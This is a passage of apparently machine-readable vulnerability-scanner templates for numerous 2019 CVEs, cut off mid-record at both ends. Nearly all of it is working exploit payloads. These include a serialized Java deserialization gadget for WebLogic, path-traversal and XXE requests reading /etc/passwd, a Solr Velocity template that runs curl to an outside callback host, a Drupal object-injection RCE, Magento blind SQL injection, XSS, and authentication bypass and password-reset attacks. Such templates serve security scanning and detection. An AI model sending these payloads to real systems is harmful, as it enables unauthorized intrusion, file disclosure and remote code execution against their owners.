index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7139","info":{"name":"Magento - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"text/x-magento-init\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","contains(content_type_1, \"application/json\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["contains(content_type_2, \"application/json\") && contains(content_type_3, \"application/json\")","status_code_2 == 200 && status_code_3 == 400","len(body_2) == 2 && len(body_3) == 2"],"condition":"and"}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open Redirect","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/share/page/dologin"],"body":"success=%2Fshare%2Fpage%2F&failure=:\\\\interact.sh&username=baduser&password=badpass\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: 